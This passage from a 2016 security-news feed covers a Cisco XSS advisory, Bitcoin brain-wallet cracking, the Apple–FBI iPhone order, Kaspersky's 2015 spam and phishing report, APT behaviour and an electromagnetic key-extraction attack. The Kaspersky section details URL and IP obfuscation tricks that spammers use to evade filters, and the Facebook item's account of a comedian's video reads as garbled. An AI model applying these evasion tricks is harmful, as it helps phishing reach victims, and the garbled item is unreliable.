Cisco disclosed also a second vulnerability, coded as CVE-2016-1331, in Cisco Emergency Responder, a family of devices designed to allow emergency teams to identify the location of 911 callers. The vulnerability is a cross-site scripting (XSS) rated as medium-severity that allows unauthenticated attacker to execute arbitrary code in the context of the vulnerable web interface and access potentially sensitive browser information.
“A vulnerability in the web framework code of Cisco Emergency Responder could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against the user of the web interface of an affected system.” states the Cisco Advisory.”
“The vulnerability is due to insufficient input validation of some parameters passed to the web server. An attacker could exploit this vulnerability by convincing the user to access a malicious link or by intercepting the user request and injecting malicious code. An exploit could allow the attacker to execute arbitrary code in the context of the affected site or allow the attacker to access sensitive browser-based information.”
In a possible attack scenario, the attacker can trigger the vulnerability by tricking the victim into clicking on a malicious link or by injecting malicious code into an intercepted connection.
Also in this case, there is no patch available neither a workaround.
$103,000 stolen in Brain Wallets cracking attacks
17.2.2016 Computer Attack
A group of researchers discovered that roughly 1,000 brain wallets have been drained by cyber criminals that have stolen $103,000
The term brainwallet refers to the concept of storing Bitcoins in one’s own mind by memorization of a passphrase. The phrase is converted into a 256-bit private key with a hashing or key derivation algorithm (example: SHA256). That private key is used to calculate the final Bitcoin address.
This method was erroneously considered secure because malware based attacks are ineffective in stealing private keys, but now an expert demonstrated that brain wallets are not secure because the passwords can be easily cracked by an attacker. The researcher explained that brain wallets used no salt and passed plaintext passwords through a single hash iteration, this makes easy for hackers to crack brain wallet passwords. Another problem is represented by the fact that a form of the insecurely hashed passwords is stored in the Bitcoin blockchain giving more information for the attack to the hackers.
The researcher Ryan Castellucci demonstrated at the DEF CON conference last year how to crack brain wallets:
“Our implementation improves the state of the art by a factor of 2.5, with focus on the cases where side channel attacks are not a concern and a large quantity of RAM is available. As a result, we are able to scan the Bitcoin blockchain for weak keys faster than any previous implementation.” states the paper .
Now researchers at the University of Tulsa, Stanford University and the Southern Methodist University have discovered a new method to crack brain wallet passphrase faster respect the method elaborated by Castellucci.
The researchers published a paper demonstrating the efficiency of their Bitcoin Key Recovery Attacks, that is 2.5 times faster compared to Castellucci’s technique.
The researchers analyzed roughly 300 billion passwords and discovered that only less than 1,000 brain wallets used between September 2011 and August 2015.
“In this paper, we report on the first large-scale measurement of the use of brain wallets in Bitcoin. Using a wide range of word lists, we evaluated around 300 billion passwords. Surprisingly, after excluding activities by researchers, we identified just 884 brain wallets worth around $100K in use from September 2011 to August 2015.” researchers wrote in their paper.
“Our results reveal the existence of an active attacker community that rapidly steals funds from vulnerable brain wallets in nearly all cases we identify,” explained the researchers. “In total, approximately $100K worth of bitcoin has been loaded into brain wallets, with the ten most valuable wallets accounting for over three-quarters of the total value. Many brain wallets are drained within minutes, and while those storing larger values are emptied faster, nearly all wallets are drained within 24 hours.”
The passwords were derived from words available in dictionaries, the passwords were then compared to a list of all used Bitcoin addresses to determine which of them were associated with brain wallets.
Experts identified 884 brain wallets storing 1,806 BTC (worth approximately $100,000) and discovered that only 21 of them were not drained by cyber criminals.
It was disconcerting that in many cases, the accounts were drained within minutes or seconds, the researchers also noticed that there is no evidence that Bitcoin wallets containing larger amounts of money were protected by the owners with stronger passwords.
“We find that all but 21 wallets were drained, usually within 24 hours but often within minutes. We find that around a dozen “drainers” are competing to liquidate brain wallets as soon as they are funded.” continues the researchers.
The experts analyzed the Bitcoin transactions involving brain wallets and discovered that at least 14 entities were involved in the attacks.
“A few drainers are very successful while the rest do not make very much,” researchers wrote in their paper. “The top 4 drainers have netted the equivalent of $35,000 between them. The drainer who has emptied the most brain wallets — 100 in all — has earned $3,219 for the effort. But other drainers have stolen very little money. For example, one drainer stole from 78 different brain wallets but netted only $62 worth of bitcoin.”
The group of researchers will present the study, titled “The Bitcoin Brain Drain: A Short Paper on the Use and Abuse of Bitcoin Brain Wallets,” at the next Financial Cryptography and Data Security 2016 conference.
US Judge requests Apple to unlock San Bernardino shooter’s iPhone
17.2.2016 Apple
A US magistrate ordered Apple to help unlock San Bernardino shooter’s iPhone, be aware it is demanding a tool to bypass the security mechanism.
We discussed very often of the difficulties of the law enforcement in conducting investigations when suspects used devices that make use of encryption, the case that we are going to analyze is emblematic.
Apple must assist the FBI in unlocking the passcode-protected encrypted iPhone belonging to Syed Farook, one of the San Bernardino shooters in California.
The smartphone belonged to Syed Farook, who with his wife Tashfeen Malik killed 14 coworkers on December 2, 2015. Police intervened but failed to capture them alive because they died in a shootout with agents.
The agents seized the Syed’s smartphone, an iPhone 5C, but they were not able to access it because it is protected by a password. The authorities requested support to Apple with a court order issued by the US magistrate Sheri Pym.
After 10 wrong guesses, the iOS locks up requiring a sync with iTunes to restore, or automatically wipes the handset’s data, depending on the user settings.
The magistrate Sheri Pym is requesting Apple to find a way to supply software that prevents the phone from automatically wipe data when too many attempts fail. In this way, the police is free to run a brute-force attack to guess the PIN and overwhelm the security feature.
Apple have to unlock San Bernardino shooter's iPhone
Be aware, the magistrate hasn’t requested apple to crack its encryption, instead, it demands a tool to bypass the security mechanism.
As reported by The Register:
“It’s technically possible for Apple to hack a device’s PIN, wipe, and other functions. Question is can they be legally forced to hack,” stweeted Forensic scientist Jonathan Ździarski.
“Theory: either NSA/CIA dragnet and cryptanalysis capabilities are severely limited, or this is a test case to see how the courts respond.”
Judge Pym is requesting a software update working only on the Farook’s iPhone and running only on government or Apple property.
At this point Apple has two options, demonstrate that it cannot technically comply with the order or provide the requested software.
There is no such time, Apple has five days!
Kaspersky Security Bulletin. Spam and phishing in 2015
16.2.2016 Zdroj: Kaspersky Spam
According to Kaspersky Lab, in 2015
The proportion of spam in email flows was 55.28%, which is 11.48 percentage points lower than in 2014.
79% of spam emails were no more than 2 KB in size.
15.2% of spam was sent from the US.
146,692,256 instances that triggered the ‘Antiphishing’ system were recorded.
Russia suffered the highest number of phishing attacks, with 17.8% of the global total.
Japan (21.68 %) took the lead in the ranking of unique users attacked by phishers.
34.33% of phishing attacks targeted online financial organizations (banks, payment systems and online stores).
New domain zones in spam
In early 2015, we registered a surge in the number of new top-level domains used for distributing mass mailings. This was caused by the growth in interest among spammers for the New gTLD program launched in 2014. The main aim of this program is to provide organizations with the opportunity to choose a domain zone that is consistent with their activities and the themes of their sites. The business opportunities provided by New gTLD were enthusiastically endorsed by the Internet community, and active registration of new domain names is still ongoing.
In 2015, proportion of #spam was 55.28% down from 66.76% in 2014 #KLReport
Tweet
However, new domain zones almost immediately became an arena for the large-scale distribution of spam, as cybercriminals registered domains to spread mass mailings. At first, there was some logical connection between the theme of the spam and the domain name, but this changed as the year went on and the domain names used in mass mailings were, on the whole, not related to the subject of the spam. However, even now we still come across isolated cases where the connection is noticeable. For example, online dating sites are often placed in the .date zone.
This lack of any connection between the domain name and spam theme was mainly caused by the cost of new domains. The attackers try to choose the cheapest possible hosting because the sites will often be used just once for a specific spam mass mailing, so the domain name does not play a major role. Instead, the deciding factors tend to be the cost of the domains and the discounts that small registrars are willing to provide for bulk purchases.
Spammer tricks: methods for expressing domain names
Scammers try to make every email unique in order to bypass mass filtering and complicate the work of content filters. It is quite easy to make each text different by using similar characters from other alphabets, or by changing the word and sentence order, etc. But there is always the address of the spammer site – it can’t be changed so easily, and the whole point of sending out spam is for users to click a link to the advertised site. Over the years, spammers have come up with numerous ways to hide the spammer site from anti-spam filters: redirects to hacked sites, generation of unique links to short URL services, the use of popular cloud services as redirects, etc.
In 2015, 79% of spam emails were less than 2 KB in size #KLReport
Tweet
In 2015, in addition to the methods mentioned above, spammers also focused on ways of expressing domain names and IP addresses. Here we take a closer look at these tricks by studying examples taken from a variety of spam messages.
Special features of the IP protocol: different IP formats
The standard method of writing IP addresses IPv4 is the dotted-decimal format where the value of each byte is given as a decimal number from 0 to 255, and each byte is separated by a dot. However, there are other formats that browsers will interpret correctly. These are binary, octal, hexadecimal formats, and the format dword/Undotted Integer when every IP byte is first converted to a hexadecimal format, then all the bytes are written in one number in the order they were written in the IP address, and then this number is converted into the decimal system. All these formats can be combined by writing each part of the IP in a different way, and the browser will still interpret it correctly!
These techniques are exploited by spammers. They write the same IP addresses in many different ways, including the method of combining different formats:
oct – hex
oct – dword
hex – dword
Addresses in hexadecimal format can be written with and without dots separating the numbers:
Kaspersky Security Bulletin. Spam and phishing in 2015
Additionally, 4294967296 (256^4) can be added any number of times to the number in the Integer format, and the result will still be interpreted as the same IP address.
In 2015, 15.2% of spam was sent from the US #KLReport
Tweet
In the decimal format, the number 256 can be added to each part of the IP address any amount of times – as long as there is a three-digit result, the address will be interpreted correctly.
In the octal format, any number of leading zeros can be added to the IP address, and it will remain valid:
You can also insert any number of forward slashes in the address:
Although in some legal libraries IP addresses can be stored in different formats, it is prohibited to use any format other than the standard dotted-decimal in the URL (i.e., in the links being referred to).
Obfuscation of an IP address, or how many ways can a number be written in Unicode
We have already written about the obfuscation of key words in spam using various Unicode ranges.
The same tricks can be applied when writing IP addresses and domain names. With regards to an IP, in 2015 spammers often used Unicode numbers from the so-called full-size range. Normally, it is used with hieroglyphic languages so that Latin letters and numbers do not look too small and narrow compared to the hieroglyphics.
We also came across figures from other ranges – figures in a circle, figures that are underscored, etc.:
Obfuscation of domains
As mentioned above, this trick also works with domains. Unicode has even more letter ranges than numerical. Spammers often used multiple ranges in a single link (changing them randomly in every email, thereby increasing the variability within a single mass mailing).
To make the links even more unique, rather than obfuscating the spammer site itself the scammers obfuscated short URL services where the links to the main site were generated in large quantities:
Interpreting URL symbols
URLs contain special symbols that spammers use to add ‘noise’. Primarily, it is the @ symbol which is intended for user authentication on the site. A link such as http://login:password@domain.com means that the user wants to enter the site domain.com using a specific username (login) and password. If the site does not require authentication, everything that precedes the @ symbol, will simply be ignored. We came across mass mailings where spammers simply inserted the @ symbol in front of the domain name and mass mailings where the @ symbol was preceded with a random (or non-random) sequence:
It is interesting that this technique was used to obfuscate links; that is usually the prerogative of phishers. This method of presenting URLs can be used by fraudsters to trick users into thinking that a link leads to a legitimate site. For example, in the link http://google.com@spamdomain.com/anything the domain that the browser accepts is spamdomain.com, not google.com. However, in order to trick users, spammers have used another domain-related technique: they registered lots of domains beginning with com-. With third-level domains the links in emails looked like this: http://learnmore.com-eurekastep.eu/find
If you don’t look carefully, you might think that the main domain is learnmore.com, whereas it is in fact com-eurekastep.eu.
In addition to the @ symbol, scammers filled links with other symbols: www.goo&zwj.g&zwjl/0Gsylm.
For example, in the case above the “&zwj” fragment in the goo.gl domain has been inserted randomly in different parts of the domain making the link unique in each email. This insertion is called a zero-width joiner; it is used to combine several individual symbols in the Hindi languages as well as emoticons in one symbol. Within the domain, it obviously carries no semantic meaning; it simply obfuscates the link.
Yet another method of obscuring links is the use of a “soft hyphen” (SHY). In HTML, SHY is a special symbol that is not visible in the text, but if a word containing a special symbol doesn’t fit in at the end of a line, the part after the special symbol is moved to the next line, while a hyphen is added to the first part. Typically, browsers and email clients ignore this symbol inside links, so spammers can embed it anywhere in a URL and as often as they like. We came across a mass mailing where soft hyphens had been inserted in the domain more than 200 times (hexadecimal encoding):
As well as the soft hyphen there are other special symbols used in domains – the sequence indicator (& ordm;), the superscripts 1 and 2 (& sup1 ;, & sup2;) – that can be interpreted by some browsers as the letter “o” and the figures “1” and “2” respectively.
Reiteration of a popular domain name
Another original way of adding noise to links used by spammers in 2015 was the use of a well-known domain as a redirect. This trick is not new, but this time the fraudsters added the same well-known domain several times:
Emails without a URL
It is also worth mentioning those cases where no domains were used at all. Instead of a URL, a number of spam mailings contained a QR-code.
Other mass mailings prompted the user to enter a random sequence in a search engine; the link to the site appeared at the top of the search results:
World events in spam
The next Olympic Games in Brazil only take place in the summer of 2016, but already in 2015 fraudulent notifications of lottery wins dedicated to this popular sporting event were being registered. These included emails containing an attached PDF file that informed recipients that their address had been randomly selected out of millions of email addresses. In order to claim the prize it was necessary to respond to the email and provide specific personal information. In addition to the text, the attachments contained different graphical elements (logos, photos, etc.). The fake lottery win notifications, which were of a considerable length, were often sent out with attachments to bypass spam filtering.
In 2015, ‘Nigerian’ scammers exploited political events in Ukraine, the war in Syria, the presidential elections in Nigeria and earthquake in Nepal to convince recipients that their stories were genuine. The authors primarily sought help to invest huge sums of money or asked for financial assistance. These so-called Nigerian letters made use of the customary tricks to deceive recipients and extort money from them.
Emails about the war in Syria often mentioned refugees and Syrian citizens seeking asylum in Europe. Some emails were made to look as if they had been sent directly from refugee camps and contained complaints about the poor conditions.
Statistics
Proportion of spam in email traffic
In 2015, the proportion of spam in email traffic was 55.28%, which is 11.48 percentage points lower than the previous year.
The proportion of spam in email traffic, 2015
The most noticeable drop was registered in the first months of 2015 – from 61.86% in January to 53.63% in April. The fluctuations throughout the rest of the year were inconsiderable – within 1-2 percentage points.
Sources of spam by country
Sources of spam by country, 2015
In 2015, there was a slight change to the top three sources of spam: China (6.12%) dropped to fourth although the proportion of spam distributed from that country actually increased by 0.59 percentage points. Replacing it in third place was Vietnam (6.13%), which saw 1.92 percentage points added to its share. Russia (6.15%) remained in second place with an increase of 0.22 percentage points, while the US (15.16%) remained the undisputed leader despite a decrease of 1.5 percentage points.
In 2015, users in USA were targeted by 4.92% of worldwide malicious emails #KLReport
Tweet
As was the case in 2014 Germany came fifth (4.24%), with its contribution increasing by 0.24 percentage points. The rest of the Top 10 consisted of Ukraine (3.99%, +0.99 p.p.), France (3.17%, +0.62 p.p.), India (2.96%, no change), Argentina (2.90%, -0.65 p.p.) and Brazil (2.85%, +0.42 p.p.).
The size of spam emails
The size of spam emails in 2015
The proportion of super-short spam emails (under 2 KB) grew in 2015 and averaged 77.26%, while the share of emails sized 2-5 KB fell to 9.08%. The general trend of 2015 was a reduction in the size of emails.
Malicious attachments in email
The Top 10 malicious programs spread by email in 2015
The notorious Trojan-Spy.HTML.Fraud.gen remained the most popular malicious program sent by email. This program is a fake HTML page sent via email that imitates an important notification from a large commercial bank, online store, or software developer, etc. This threat appears as an HTML phishing website where a user has to enter his personal data, which is then forwarded to cybercriminals.
Trojan-Downloader.HTML.Agent.aax was in second, while ninth and tenth positions were occupied by Trojan-Downloader.HTML.Meta.as. and Trojan-Downloader.HTML.Meta.ay respectively. All three are HTML pages that, when opened by users, redirect them to a malicious site. Once there, a victim usually encounters a phishing page or is offered a download – Binbot, a binary option trading bot. These malicious programs spread via email attachments and the only difference between them is the link that redirects users to the rigged sites.
Third was Trojan-Banker.Win32.ChePro.ink. This downloader is a CPL applet (a Control Panel component) that downloads Trojans designed to steal confidential financial information. Most malicious programs of this type are aimed at Brazilian and Portuguese banks.
Email-Worm.Win32.Mydoom.l was in fourth place. This network worm spreads as an email attachment via file-sharing services and writable network resources. It harvests email addresses from infected computers so they can be used for further mass mailings. To send the email, the worm directly connects to the SMTP server of the recipient.
Next came Trojan.JS.Agent.csz and Trojan-Downloader.JS.Agent.hhi, which are downloaders written in JavaScript. These malicious programs may contain several addresses (domains) which the infected computer consecutively calls. If the call is successful, a malicious EXE file is downloaded in the temp folder and run.
Trojan-PSW.Win32.Fareit.auqm was in eighth position. Fareit Trojans steal browser cookies and passwords from FTP clients and email programs and then send the data to a remote server run by cybercriminals.
Malware families
Throughout the year, Upatre remained the most widespread malware family. Malware from this family downloads the Trojan banker known as Dyre/Dyreza/Dyzap.
MSWord.Agent and VBS.Agent occupied second and third places respectively. To recap, these malicious programs are DOC files with an embedded macro written in Visual Basic for Applications (VBA), which runs on opening the document. It downloads and runs other malware, such as Andromeda.VBS.Agent. As the name suggests, it uses the embedded VBS script. To download and run other malware on the user’s computer the malicious programs of this family utilize the ADODB.Stream technology.
The Andromeda family came fourth. These programs allow the attackers to secretly control infected computers, which often become part of a botnet. Noticeably, in 2014 Andromeda topped the rating of the most widespread malware families.
In 2015, #Japan (21.68 %) took the lead in the ranking of unique users attacked by phishers #KLReport
Tweet
The Zbot family came fifth. Representatives of this family are designed to carry out attacks on servers and user computers, and also for capturing data. Although ZeuS/Zbot is capable of carrying out various harmful actions, it is most often used to steal banking information.
Countries targeted by malicious mailshots
Distribution of email antivirus verdicts by country, 2015
For the previous three years, the Top 3 countries most often targeted by mailshots has remained unchanged – the US, the UK and Germany. However, in 2015, spammers altered their tactics and targets. As a result, Germany came first (19.06%, +9.84 p.p.) followed by Brazil (7.64%, +4.09 p.p.), which was only sixth in 2014.
The biggest surprise in Q3, and the whole of 2015, was Russia’s rise to third place (6.30%, +3.06 p.p.). To recap, in 2014 Russia was ranked eighth with no more than 3.24% of all malicious spam being sent to the country.
We would like to believe that despite the trend seen in recent quarters, the number of malicious mass mailings sent to Russia will decrease. As for the total number of malicious attachments sent via email, their number is likely to grow in 2016 and the theft of personal information and Trojan ransomware will occupy the top places.
Special features of malicious spam
In spam traffic for 2015 we registered a burst of mass mailings with macro viruses. The majority of emails containing macro viruses in Q1 were sent in attachments with a .doc or .xls extension and belonged to the Trojan downloader category designed to download other malicious programs.
As a rule, the malicious attachments imitated various financial documents: notifications about fines or money transfers, unpaid bills, payments, complaints, e-tickets, etc. They were often sent on behalf of employees from real companies and organizations.
In 2015, 34.33% of phishing attacks targeted clients of financial organizations #KLReport #banking
Tweet
The danger posed by macro viruses is not restricted to their availability and ease of creation. A macro virus can infect not only the document that is opened initially but also a global macro common to all similar documents and consequently all the user’s documents that use global macros. Moreover, the VBA language is sufficiently functional to be used for writing malicious code of all kinds.
In 2015, cybercriminals specializing in malicious spam continued to distribute malware in non-standard archive formats (.cab, .ace, .7z, .z, .gz). These formats were introduced long ago and are used by specialists in software development and installation, but they are largely unknown to ordinary users, unlike ZIP and RAR. Another difference is the high degree of file compression. These malicious archives were passed off as a variety of attachments (orders, invoices, photographs, reports, etc.) and contained different malicious programs (Trojan-Downloader.Win32.Cabby, Trojan-Downloader.VBS.Agent.azx, Trojan-Spy.Win32.Zbot .iuk, HawkEye Keylogger, etc.). The vast majority of emails were in English, though there were messages in other languages.
In 2014, cybercriminals were particularly active in sending out fake emails from mobile devices and notifications from mobile apps containing malware and adverts. In 2015, the mobile theme continued: malicious programs were distributed in the form of .apk and .jar files, which are in fact archived executable application files for mobile devices. Files with the .jar extension are usually ZIP archives containing a program in Java, and they are primarily intended to be launched from a mobile phone, while .apk files are used to install applications on Android.
In particular, cybercriminals masked the mobile encryption Trojan SLocker behind a file containing updates for Flash Player: when run, it encrypts images, documents and video files stored on the device. After launching, a message is displayed telling the user to pay a fee in order to decrypt his files. Another .jar archive contained Backdoor.Adwind written in Java. This multi-platform malicious program can be installed not only on mobile devices but also on Windows, Mac and Linux.
The attackers who send out malware in files for mobile devices are most probably hoping that recipients using email on a mobile device will install the malicious attachment.
With every year, cybercriminals are becoming more interested in mobile devices. This is primarily due to the constant increase in activity by mobile users (using messengers and other methods of exchanging data) and the migration of different services (e.g., financial transactions) to mobile platforms, and of course, one user may have several mobile devices. Secondly, it is due to the emergence of various popular apps that can be used by cybercriminals both directly (for sending out spam, including malicious spam) and indirectly (in phishing emails). For example, users of the popular messenger WhatsApp fall victim to not only traditional advertising spam but also virus writers. Mobile users should be especially careful because cybercriminal activity in this sphere is only likely to increase.
Phishing
Main trends
In 2015, the Anti-Phishing system was triggered 148,395,446 times on computers of Kaspersky Lab users. 60% (89,947,439) of those incidents were blocked by deterministic components and 40% (58,448,007) by heuristic detection components.
Methods of distributing phishing content
The methods used by cybercriminals to spread phishing content have long gone beyond the framework of email clients. For example, one of the most popular ways of distributing phishing pages is pop-up ads. In 2015, we came across a variety of fraudulent schemes utilizing this simple trick: the fake page automatically opens in the browser when a user visits certain sites, including legitimate ones, but uses pop-up advertising.
Cybercriminals used this technique to attack customers of Russian banks in the third and fourth quarters of 2015.
The fraudulent page to which the victim is redirected by a pop-up advert
Other popular themes of the year
As we mentioned in Q1, the contribution of the ‘Delivery company’ category is very small (0.23%), but it has recently experienced a slight increase (+0.04 p.p.). In addition, DHL, one of the companies in this category, was among the Top 100 organizations most often targeted by phishers.
This method – an email sent on behalf of a delivery firm – is often used by fraudsters to distribute malicious attachments, gather personal information and even collect money.
Phishing email sent on behalf of FedEx
The attackers are especially active in this category in the run-up to holidays when people tend to buy presents using popular delivery services.
Email tricks
Scammers have long made successful use of PDF attachments in phishing attacks. These files are usually a form for entering personal information that is sent to the fraudsters by pressing a button in the file. However, in 2015 we saw a surge of emails in which the text message and the link to the phishing page were included in the PDF document. The text in the body of the message was reduced to a minimum to bypass spam filtering.
These tricks are used against organizations in all categories. In 2015, many attacks of this type targeted banking and mail organizations.
Example of a phishing email. The body of the message contains only the text imitating the heading of the email to which this email is allegedly responding. The email has an attached PDF file that contains the link to the phishing page.
We came across numerous PDF files that redirected victims to phishing websites. The fraudsters encouraged the user to click on ‘View pdf File’ to read the contents of the file.
A phishing email with an attached PDF file containing a redirect to a phishing website
The geography of attacks
Top 10 countries by percentage of attacked users
Japan had the highest proportion of users subjected to phishing attacks (21.68%), a 2.17 p.p. increase from the previous year.
The percentage of users on whose computers the anti-phishing system was triggered out of the total number of users of Kaspersky Lab products in the country, 2015
Top 10 countries by percentage of attacked users
Japan 21.68%
Brazil 21.63%
India 21.02%
Ecuador 20.03%
Mozambique 18.30%
Russia 17.88%
Australia 17.68%
Vietnam 17.37%
Canada 17.34%
France 17.11%
Last year’s leader, Brazil (21.63%), fell to second place with a drop of 5.77 percentage points in the number of attacked users. It was followed by India (21.02%, -2.06 p.p.) and Ecuador (20.03%, -2.79 p.p.).
The distribution of attacks by country
Russia accounted for the greatest share of phishing attacks, with 17.8% of the global total, an increase of 0.62 percentage points compared to the previous year.
Distribution of phishing attacks by country in 2015
Behind Russia in second place was Brazil (8.74%, +1.71 p.p.), followed by India (7.73%, +0.58 p.p.), the US (7.52%, +0.32 p.p.), with Italy rounding off the Top 5 (7.04%, +1.47 p.p.).
Organizations under attack
The statistics on organizations used in phishing attacks are based on the triggering of the heuristic component in the anti-phishing system. The heuristic component is triggered when a user tries to follow a link to a phishing page and there is no information about the page in Kaspersky Lab’s databases.
Distribution of organizations subject to phishing attacks by category, 2015
In 2015, we saw significant growth in the proportion of phishing attacks on organizations belonging to the ‘Online finances’ category (34.33%, +5.59 pp): they include the ‘Banks’, ‘Payment Systems’ and ‘Online stores’ categories. Of note is the increase in the percentage of targeted organizations in the ‘Telephone and Internet service providers’ (5.50%, +1.4 p.p.) and ‘Social networking sites and blogs’ (16.40%, +0.63 p.p.) categories.
Top 3 organizations attacked
Organization % of detected phishing links
1 Yahoo! 14.17
2 Facebook 9.51
3 Google 6.8
In 2015, Yahoo! was once again the organization targeted most by phishers, although its share decreased considerably – 14.17% vs 23.3% in 2014. We presume this decrease is a result of the company combating these fake domains. We see that Yahoo!, as well as many other organizations, registers lots of domains that could theoretically be used by the attackers as they are derived from the original domain name.
Conclusion and forecasts
In 2015, the proportion of spam in email traffic decreased by 11.48 percentage points and accounted for 55.28%. The largest decline was observed in the first quarter; from April the fluctuations stabilized and were within a few percentage points. This reduction was caused by the migration of advertising for legal goods and services from spam flows to more convenient and legal platforms (social networks, coupon services, etc.), as well as by the expansion of the “gray” zone in mass mailings (mass mailings sent both to voluntary subscribers and to people who have not given their consent). We assume the share of spam will continue to decrease in 2016, though the decline will be insignificant.
The number of malicious and fraudulent messages, however, will increase. It is possible that the attackers will once again make use of their customary tricks as was the case in 2015 (mass mailings of macro viruses and non-standard attachment extensions). The mobile theme may also become yet another weapon in the cybercriminals’ arsenal to spread malware and fraudulent spam.
The number of new domains created by spammers especially for distributing mass mailings will continue to grow. We also expect to see an expansion in new domain zones used as spammer resources.
APT Groups don’t go under the grid after a successful attack!
16.2.2016 APT
What happened to some of the APT groups behind clamorous cyber attacks? Why they don’t go dark anymore after being outed, a behavior completely different from the past.
I’m sure everyone remembers the Sony attack occurred in 2014, when the US Government blamed the North Korean Government for the attack, materially executed by a hacking group dubbed GOP. In the past, the APT groups behind major attacks went underground for some time until the dust settles in, but now, more and more hacking crews remain active after a big score, using information gathered from the successful attack to target more victims.
Juan Andres Guerrero-Saade, senior security researcher at Kaspersky Lab. Said expressed his opinion on the Sony hack.
“They didn’t disappear when the dust settled” ha said.
Last week, during the summit in Tenerife, Guerrero-Saade and Jaime Blasco provided some news about Sony hackers:
“It took us two years to correlate all of the information we had … The same people were launching campaigns using information from the Sony attack,”
Why threat groups don’t remain under the radar after a big score?
Kurt Baumgartner, principal security researcher at Kaspersky Lab argues that in the past APT groups “would immediately shut down their infrastructure when they were reported on”, “You just didn’t see the return of an actor sometimes for years at a time.”
Baumgartner used the example of Darkhotel, a Korean-speaking attack group mostly known for hacking WiFi networks at luxury hotels, with the purpose of targeting high -evel executives. Even thought Darkhotel its not attacking hotels anymore, they are not hidden neither, in fact in July was discovered that Darkhotel was using a zero-day Adobe Flash exploit (disclosed from the Hacking Team data breach),
“Within 48 hours, they took the Flash exploit down … They left a loosely configured server”.
Darkhotel doesn’t look worried about exposure, “The hotel [attack] activity focused on business travelers has come to an end, but the other operations are highly active,”.
It is assumed that several groups have a similar behavior, the Equation Group for example that many experts linked to the NSA is believed has changed communication methods to avoid detection.
“I would assume they are active but just changed their” communications, explained Costin Raiu, director of the global research and analysis team at Kaspersky Lab. “We don’t detect them anymore.”
This pattern is found over and over hackers groups, and it looks like notoriety doesn’t stop these groups anymore.
Facebook Offering You $1000 to Run Advertisement Against Terrorism
16.2.2016 Social Site
Facebook Offering $1,000 Credits If You Want to Run Advertisements Against ISIS and Terrorism
Over a past few times, we have seen a steady growth in the online recruitment of Jihadis from social networking sites by many radical groups.
ISIS has topped the online recruitment, and it is the only terror group that leverages the enormous power of Twitter and Facebook to radicalize young minds, spread its message and recruit foreign supporters to its fights.
Many ISIS militants maintain extremely active accounts on the popular social media platforms and have a strong presence on the most popular encrypted messaging app Telegram with more than 100,000 followers.
This issue had impacted the society deeply. Recent examples include last year’s Paris attack in which ISIS used some popular messaging apps to plot the attack.
As the Dark Siders of social media began to turn this platform into a Terror-Picker, the White Siders of the same social media came under a single roof to declare fight against terrorism, and rage cyber war against these anti-humans.
Facebook Buckled Up to Fight against Terrorism
Facebook is also on the main line up to join the fight against terrorism. The social media giant has also come up with a solution to minimize the presence of caliphate group from its social media platform.
Similar efforts have previously been made by Anonymous hacktivist group, who conducted various planned operation like OpISIS, OpParis, expunging ISIS channels from Twitter and Telegram.
Recently, Facebook introduced a new program, dubbed "Counter-Speech," that offers advertising credits up to $1000 for those who raise their voice against hate speeches & terror propagandas.
This new intelligent strategy would enlighten the immature minds of those who got influenced by the radicalized propaganda and created an automatic hatred towards the group (who tried to brainwash with their propagandas).
So, rather than vanishing or blocking the extremist Facebook pages that spread hatred among its followers, Facebook is focusing on educating more and more young minds in an effort to fight against terrorism.
The First Person to Receive $1000 Credit
Arbi-el-Ayachi - A German comedian had got benefited from the newly released Facebook plan when he released a video showing eating halal meat is poisonous to Christians, last year.
How did the idea strike?
The idea was formed by the current Facebook Chief Operating Officer Sheryl Sandberg while speaking at World Economic Forum last month.
Sandberg backed up this idea by referring to a recent attack conducted by the group in Germany called "Laut gegen Nazis" (an anti-neo nazi group) had attacked the Facebook page of the far-right NDP by getting members to like ("Like Attack") and post on the page.
"Rather than scream and protest, they got 100,000 people to like the page, who did not like the page and put messages of tolerance on the page, so when you got to the page, it changed the content and what was a page filled with hatred and intolerance was then tolerance and messages of hope" Sandberg stated.
Cyber World Fights Against Terrorism
Gradually, the massive operation to fight against terrorist organizations began to hit the headlines and grabbed the attention of several tech giants like Google, YouTube, and Twitter.
Youtube had wiped out more than 1000 dozens of radical videos from its database.
Twitter had expelled 1,25,000 accounts of Jihadi members since in mid 2015.
Google also rolled out a special advertising program for terrorist sympathizers who type extremism-related words in the search engine, but the "top" search results display anti-radicalized links.
Joint ventures like this would act as a Digital Age Shield to minimize the threat levels.
However, Facebook had not mentioned about the verification procedure for those credited $1000. So, it may be possible that those awarded credits could be used for personal promotions too...
How-to — Stealing Decryption Key from Air-Gapped Computer in Another Room
16.2.2016 Safety
Stealing Decryption Key from Air-Gapped Computer in Another Room
Air-gapped computers that are believed to be the most secure computers on the planet have become a regular target for researchers in recent years.
Air-gap computers are one that are isolated from the Internet or any other computers that are connected to the Internet or external network, so hackers can’t remotely access their contents.
But you need to think again before calling them 'Safe.'
A team of security researchers from Tel Aviv University and Technion have discovered a new method to steal sensitive data from a target air-gapped computer located in another room.
The team is the same group of researchers who had experimented a number of different methods to extract data from a computer. Last year, the team demonstrated how to extract secret decryption keys from computers using just a radio receiver and a piece of pita bread.
In 2014, the team devised a special digitizer wristband that had the ability to extract the cryptographic key used to secure data stored on a machine just by solely touching the chassis of the computer.
Extracting Secret Decryption Key in Seconds
Now taking its experiment a step further, the team of researchers, including Daniel Genkin, Lev Pachmanov, Itamar Pipman, and Eran Tromer, recently discovered a similar way to extract secret decryption key within seconds, but this time, from an air-gapped machine.
Although hacking air-gapped machines to steal cryptographic keys has been carried out in past, this is the first time when such attack have successfully targeted computer running Elliptic Curve Cryptography (ECC).
Elliptic Curve Cryptography is a robust key exchange algorithm that is most widely used in everything from securing websites to messages with Transport Layer Security (TLS).
How Does the Method Work?
Researchers used a method known as Side-Channel Attack: An attack that extracts the secret cryptographic key from a system by analyzing the pattern of memory utilization or the electromagnetic outputs of the PC that are emitted during the decryption process.
"By measuring the target's electromagnetic emanations, the attack extracts the secret decryption key within seconds, from a target located in an adjacent room across a wall," reads the recently published paper [PDF].
Specifically, the team obtained the private key from a laptop running the popular implementation of OpenPGP, GnuPG. However, the developers of GnuPG have since rolled out countermeasures to this method, making GnuPG more resistant to side-channel attack.
Equipment Required:
The equipment used in the experiment hack included:
An antenna
Amplifiers
A software-defined radio
A laptop
During the experiment hack, the researchers first sent the target laptop a specific ciphertext (an encrypted message).
Now, during the decryption of the chosen ciphertext, the researchers measured the EM leakage of the laptop, "focusing on a narrow frequency band."
The signal was then processed, and a clear trace was produced, revealing the information about the operands used in the ECC, which in turn revealed the secret key.
